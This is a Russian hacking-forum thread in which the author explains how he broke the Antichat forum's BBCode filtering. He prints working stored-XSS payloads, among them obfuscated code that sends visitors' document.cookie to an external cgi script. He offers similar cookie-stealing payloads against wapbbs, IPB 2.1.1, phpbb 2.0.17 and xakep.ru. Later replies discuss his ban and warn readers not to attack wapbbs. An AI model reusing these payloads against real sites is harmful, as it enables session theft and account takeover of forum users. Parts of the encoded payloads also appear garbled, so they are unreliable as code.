|
Долго жданная статья как ломать античатовскй форум.
Начал Я изучать форум античата с Января этого года.
Бла бла под конец - Я его взломал. Вот как Я его ломал. Должен сказать сразу, что после того как Я нашёл багу на античате, Я сразу рассказал её четырём юзером античата. Сначало Zadoxlik`у, потом моему лучшему другу на интернете xSpider`у и третьему человеку Я рассказал Jazzsummerman, который потом случайно рассказал Че Геваре который и прикрыл эту багу прежде тем, как Я ей сумел воспользовался. Без обид, что было то было. Объяснять красивым языком как Алгол, Zadoxlik Jazzsummerman Я ещё не научился, так что расскажу как могу. Первоначальная ошибка состоит в том, что теги Код HTML:
[url=http://www.antichat.ru]http://www.antichat.ru[url][/url][/url]Код HTML:
[URL=http://www.wj.com[url]http://www.wj.com]wj очень плохо отфильтрированны.Код HTML:
<a href="http://www.wj.com<a href="http://www.wj.com" target="_blank">wj" target="_blank">http://www.wj.com]wj </a></a>После этого, Я задал такой запрос античатовскому форуму: Код HTML:
[URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial]wj[/FONT][/url]И вот что он мне выдал: [HTML]<a href="http://www.wj.com<a href="http://www.wj.com" target="_blank">wj <font face="Arial">wj</font>" target="_blank">http://www.wj.com]wj <font face="Arial">wj</font></a></a>[HTML] Как уже заметно, из-за того, что теги урл фильтрируют все кавычки, nj второй тег урл отфильтрировал кавычки в теги фонт, после чего кавычки перестали существовать вообще, что Я и сам сразу не заметил. И естественно теперь одним пробелом, который как специально для нас разрешён (Тут можно прочитать подробнее о том, что становится когда кавычек нет и добавляется пробел http://www.antichat.ru/crackchat/index.html ) мы теперь можем вписывать произвольной код. Долго не буду рассказывать, что пропускается в каждом теги античата, которые мне пришлось из-за нужды вызубрить наизусть, но просто скажу, что в теги фонт, не пропускается двоеточие. <:> Эта проблема меня заставила искать помощь у других Хакеров античата. Естественно мне помог мой лучший друг по имени хSpider которые посоветовал мне использовать html объекты. Должен сказать, что алёрт у меня был и без них, через такой код. Код HTML:
[URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial size=+7 onmouseover=alert(/Hello_from_WJ/) /]wj[/FONT][/url][/URL]Код HTML:
<a href="http://www.wj.com<a href="http://www.wj.com" target="_blank">wj <font face="Arial size=100 onmouseover=alert(/Hello_from_WJ/) /">wj</font>" target="_blank">http://www.wj.com]wj <font face="Ar.../) /">wj</font></a></a>Мне захотелось пойти дальше и xSpider мне помог заменить двоеточие ( ":" ) этим символом. Цитата:
После этого, используя эту ссылку, http://www.h4cky0u.org/encrypt/index.php Я закодировал свой код? и вот что меня получилось.... [HTML]http://www.]wj [/URL][HTML Это воровало куки на ура. Вот код для желающих как ломать веб-хак. Код HTML:
[color=white][EMAIL][URL=wj`=`][/URL][/EMAIL][/color][color=white]` style=`background:url(javaSCrip t:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/color]Код HTML:
[EMAIL]wj@wj.com[URL=wj/style=background&*#58;url(javascript*:document.image*s	*1;&#*49;].*src=*"*h*;*6;*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7;	*9;*03;&*#105;*-*;b*;
*5;*10;&*#47;s.j&*#112;g?"+document.cookie); ][/URL][/EMAIL]Для интересующихся как Я ломал форум wapbbs, вот вам один из кодов. Код HTML:
[r0x][img]http://www.phpbb.com/значениеwjimages/phplogo.gif/style=background&*#58;url(*j*;	*7;*18;&*#97;&*#115*;c*;*4;*05;&#*112;*t*;:*;*00;&#*111;&*#99;&*#117;*m*;*01;&#*110;&*#116*;.*;
*5;*09;&*#97;*g*01;&*#115;*[*1*]*.src*=*4;&#*104;*t*;*6;*12;&*#58;&*#47;*/*a*;*0;*16;&*#105*;c*;
*4;&#*97;&*#116;*.**4;*17;&*#47;&*#99;&*#103;*
*5;*5;	*8;*05;&*#110;*/*s*;.*;
*6;&#*112;*g*;?*;"*;+*00;&#*111;*c*;ument.cookie); [/img][/r0x]Код HTML:
[url]http://www.wj.com[img]http://www.wapbbs.com/bbs//images/statusicon/forum_new.gif'='[/img][/url]'Так как к кукам wapbbs привязывается ещё и ИП, то это можно обойти с помощью burp proxy. http://www.portswigger.net/proxy/ Сейчас вышли новые форумы, например IPB 2.1.1 и он ломается вот так: Код HTML:
[post=1000[topic=wj style=background&*#58;url(javascript*:document.image*s	*1;&#*49;].*src=*"*h*;*6;*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7;	*9;*03;&*#105;*-*;b*;
*5;*10;&*#47;s.j&*#112;g?"+document.cookie); ] [/topic]]Форум phpbb 2.0.17 ломается вот так: (Код надо будет если время и желание будет - доработать.) Код HTML:
[img]http://www.phpbb.com/wj[email]wj@wj.com[/email]images/phplogo.gif[/img]Структура форума хакер.ру, ломается вот так. Код HTML:
[URL][img]http://www.wj'='.gif[/img][/URL]'Вот и всё. White Jordan. |
Ща попробую на других форумах статья так не чё.
|
Цитата:
|
Зачем забанили такого хорошего автора ? %-)
|
Цитата:
21:40:22: работал Я один 21:40:27: топик ответь 21:40:29: Я не могу пока 21:40:42: скажи Белый Джордан говорит что нет 21:40:45: он напомнил 21:40:50: как уже сказал в статье 21:40:53: работал сам 21:41:02: так что хСпайдера за это баннить не стоит 21:41:08: он тут не причём скажи 21:41:14: а то мали ли что 21:41:20: и впрямь бан ему влепят |
кстати если кому интересно- то он нацелен на то что щас пол ачата ломанётся вапс ломать- люди не советую!!! поимите- не стоит идти на поводу и из за него портить всем жизнь!! запомните- НЕ ДЕЛАЙТЕ ЭТОГО!!! не будте марионетками к его руках!!! если хотите проверить- то проверяйте не на его примерах!
|
а че его примеры тебе не нравятся то?? Типо у остального ачата они лучше?!
|
Цитата:
в будующем советую немного сдержаннее реагировать на мои сообщения) С Уважением Силверан))) |
чет я не понял как с помощью этого - http://www.phpbb.com/wj<a href="mail...es/phplogo.gif ломануть phpbb 2.0.17
|
Я так понимаю что для гринов угрозы никакой не было, т.к. надеюсь что все давно пересели на файрофкс или что-то в этом духе.
|
| Время: 00:29 |